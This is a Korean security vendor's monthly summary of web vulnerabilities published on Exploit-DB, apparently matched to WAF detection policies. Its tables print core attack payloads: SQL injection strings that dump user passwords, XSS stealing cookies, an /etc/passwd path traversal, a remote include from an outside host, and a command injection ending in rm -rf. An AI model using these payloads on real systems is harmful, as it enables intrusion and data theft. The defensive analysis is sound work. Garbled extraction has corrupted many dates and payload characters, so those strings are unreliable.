** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection 공격들은공격난이도면에서는단순히공격의성공여부를묻는쿼리를사용하여공격이이루어지는난이도가낮은공격들이대부분이었으나, 그위험도면에서는모두높은공격들이었습니다. 해당취약점이발견된소프트웨어를사용하는관리자는대모듈및플러그인에입력값검증을좀더엄격하게하는보안패치및시큐어코딩을실시하여 SQL Injection 공격에노출되지않도록주의하여야겠습니다. SQL Injection 이외에최근들어 Code Injection 과관련한취약점이주기적으로나타나고있습니다. PHP Code Injection 은 SQL Injection 과 Command Injection 에비해대적으로위험도가낮은취약점에속하지만여전히수많은웹사이트가 PHP 로이루어져있어 PHP 해당사이트는 Code Injection 에쉽게노출될수있습니다. PHP Code Injection 역시 SQL Injection 과마찬가지로사용자의입력값을엄격하게검증하여악의적인코드가실행되지않도록주의하여야겠습니다. 1. 취약점별보고개수취약점 보고개수 LFI 1 Command Injection 1 Code Injection 1 RFI XSS 8 SQL Injection 15 총합계 8 16 1 1 10 8 6 1 1 1 취약점별보고개수 8 15 0 LFI Command Injection Code Injection RFI XSS SQL Injection. 위험도별분류 위험도 보고개수 백분율 7 5.00% 1 75.00% 합계 8 100.00% 위험도별분류 7 1 3. 공격난이도별현황공격난이도 보고개수 백분율 7.1% 1.9% 하 78.57% 총합계 8 100.00% 공격난이도별현황 하. 주요소프트웨어별취약점발생현황 소프트웨어이름 보고개수 3 CMS Forum Ramui webblog SeaWell Networks 1 총합계 8 주요소프트웨어별취약점발생현황 1 CMS Forum Ramui webblog 3 SeaWell Networks

** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름

날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WAPPLES 정책 016-01-0 39150 SQL Injection 하 016-01-0 39150 SQL Injection 하 016-01-0 39150 SQL Injection 하 015-01-0 39150 SQL Injection 하 016-01-05 39171 XSS 하 software_add_license.php SQL delete_system.php SQL list_viewdef_software_for_syst em.php SQL system_export.php SQL EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 1.1.010 - logincheck.php XSS 취약점 /software_add_license.php?id=1%0and%01=1-- /delete_system.php?pc=1%0and%01=1-- /list_viewdef_software_for_system.php?pc=1%0and% 01=1-- /system_export.php?pc=1%0and%01=1-- POST /phpipam/site/login/logincheck.php HTTP/1.1 ipamusername=<script>alert("rxss01")</script>&ipampa ssword=xxx 1.1.010 016-01-05 39171 XSS 하 1.1.010 - logincheck.php XSS 취약점 POST /phpipam/site/login/logincheck.php HTTP/1.1 1.1.010 ipamusername=<script>alert("rxss01")</script>&ipampa ssword=xxx 016-01-05 39168 SQL Injection 하 - manage-profile.php SQL POST /manage-profile.php HTTP/1.1 email=1' and 1=1-- 016-01-05 39168 SQL Injection 하 POST /registeracc.php HTTP/1.1 - registeracc.php SQL Injection 취 약점 email=tester%0wics.com' or updatexml(,concat(0x7e,(version())),0) or' 016-01-05 39168 XSS 하 - manage-profile.php XSS POST /manage-profile.php HTTP/1.1 firstname=wics&lastname=wics&email=<script>alert(doc ument.location)</script>&password=admin&confirmpass word=admin&update=update+profile 016-01-05 39168 XSS 하 POST /registeracc.php HTTP/1.1 - registeracc.php XSS Injection 취 약점 firstname=wics&lastname=wics&email=<script>alert(1);< /script>&password=admin&confirmpassword=admin&up date=update+profile 016-01-08 390 XSS 하 POST /wps_usermeta_shortcodes.php HTTP/1.1 WP Symposium Pro Social Network Plugin 15.1 - wps_usermeta_shortcodes.php XSS 취약점 WP Symposium Pro Social Network Plugin 15.1 wpspro_country="><script>alert("1")</script><"

EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB번호 취약점분류 공격난이도 공격위험도 취약점이름 핵심공격코드 대프로그램 대환경 WAPPLES 정책 POST /doms/discoveryqueue/kill.php HTTP/1.1 016-01-1 393 Code Injection 하 NMS <= 5.3.6.0 - NMS kill.php Code <= 5.3.6.0 미탐 pids[]=echo phpinfo(); 016-01-1 393 Command Injection NMS <= 5.3.6.0 - kill.php Command POST /doms/discoveryqueue/kill.php HTTP/1.1 NMS <= 5.3.6.0 Stealth Commanding - 외부프로그램실행시도탐지 pids[]=python /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5; rm -rf /tmp/sess_ap6k1d1ucbetfk9fhcqdnk0be5 016-01-15 396 SQL Injection.xls Bitrix Module 6.5. - _xls_import.php SQL /bitrix/admin/_xls_import.php?del_prof_real=1&xls _profile=%7%0or%01=(select%0load_file(conc AT(CHAR(9),CHAR(9),(select%0version()),CHAR(6), CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99), CHAR(107),CHAR(101),CHAR(11),CHAR(6),CHAR(99),CHAR(111),CHAR(109),CHAR(9),CHAR(10),CHAR(11 1),CHAR(111),CHAR(98),CHAR(97),CHAR(11))))+--+.xls Bitrix Module 6.5. 016-01-15 396 SQL Injection.xls Bitrix Module 6.5. - _xls_import_step_.php SQL /admin/_xls_import_step_.php?save_profile=y&m ake_translit_code=y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(sel ect%0load_file(concat(char(9),char(9),(select% 0version()),CHAR(6),CHAR(97),CHAR(116),CHAR(116 ),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(11 ),CHAR(6),CHAR(99),CHAR(111),CHAR(109),CHAR(9 ),CHAR(10),CHAR(111),CHAR(111),CHAR(98),CHAR( 97),CHAR(11))))%9+-- +&xls_iblock_section_id=0&xls_identify=0&firstrow=0 &titlerow=0&firstcolumn=0&highestcolumn=0&xls_gl OBALS=0&sku_iblock_id=1&cml_link_code=1&xls_ibloc k_section_id_new=0.xls Bitrix Module 6.5. 016-01-18 3966 LFI 하 SeaWell Networks Spectrum - /configure_manage.php?action=download_config&file=.. configure_manage.php LFI 취약 /../../../../../../../../etc/passwd 점 SeaWell Networks SeaWell Networks Spectrum Stealth Commanding- 사용자정의 - 대경로탐지 016-01-18 3963 RFI 하 Forum 1.0.9 - index.php RFI 취약점 POST /index.php?act=admin&adact=skin&seadact=import HTTP/1.1 Forum Forum 1.0.9 Include Injection - 파일 Include 탐지 folderpath=../&importtype=&weburl=http://hyp3rlinx.al tervista.org/evil.zip&filepath=../&uploadtheme=&imports kin=import 016-01-18 396 XSS 하 Forum 1.0.9 - index.php XSS 취약점 POST /index.php?act=admin&adact=skin&seadact=import HTTP/1.1 Forum Forum 1.0.9 fredirect="/><script>alert("xss hyp3rlinx \n\n" + document.cookie)</script> 016-01-5 39309 SQL Injection Booking Calendar /wordpress/wp-admin/adminajax.php?action=cpabc_appointments_check_ipn_verifica Contact Form Plugin <=1.1.3 - admin-ajax.php SQL Injection tion&cpabc_ipncheck=1&itemnumber=(select * FROM 취약점 (SELECT(SLEEP(5)))Qmyx) Booking Calendar Contact Form Plugin <=1.1.3 016-01-7 393 XSS 하 WordPress Booking Calendar Contact Form <=1.1. - admin.php XSS 취약점 /wpadmin/admin.php?page=cpabc_appointments&ac=st&ch s=utf- 8&ict=%%3E%3Cimg+src%3Dx+onerror%3Dalert% 81%9%3E&ics=%%3E%3Cimg+src%3Dx+onerror %3Dalert%81%9%3E&scr=1 WordPress Booking Cross Site Scripting-사 Calendar 용자정의-이미지태그 Contact Form <=1.1. 016-01-7 39339 SQL Injection 016-01-7 39339 XSS 하 016-01-8 39355 RFI 하 jquery CMS. - gallery1.php SQL jquery CMS. - gallery1.php XSS 취약점 Ramui Web Hosting Directory Script.0 - connection.php RFI 취약점 /user/gallery1.php?g_name=1%7%0union%0all% 0select%01,,3,group_concat%8version%8%9% 9,5--+ /user/gallery1.php?g_name=%3cscript%3ealert%8% XSS%%9%3C/script%3E /gb/include/connection.php?root=http://test.com.index. php CMS CMS Ramui webblog jquery CMS. jquery CMS. Ramui Web Hosting Directory Script.0 Include Injection - 파일 Include 탐지

EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 날짜 EDB 번호취약점분류공격난이도공격위험도취약점이름핵심공격코드대프로그램대환경 WAPPLES 정책 016-01-8 3935 SQL Injection 하 016-01-9 39385 SQL Injection Ramui Forum Script 9.0 - page.php SQL /gb/include/page.php?pagename=1%0and%01=1-- Ramui webblog r58 - managefiles.php SQL POST /manage-files.php?client_id=1 HTTP/1.1 status=10' and 0 union select 0,1,'0) or 1 union select 0,1,concat(user,char(3),password),3,,5,6,7,8,9 from tbl_users -- a',3,,5,6,'7 Ramui Forum Script 9.0 r58 016-01-9 39385 SQL Injection 하 r58 - clients.php SQL POST /clients.php HTTP/1.1 r58 status=1' and 1=1-- 016-01-9 39385 SQL Injection 하 r58 - rocess-zipdownload.php SQL /rocess-zip-download.php?file=1%7%0and%01=1-- %0 r58 016-01-9 39385 SQL Injection 하 r58 - homelog.php SQL /home-log.php?action=1%7%0and%01=1--%0 r58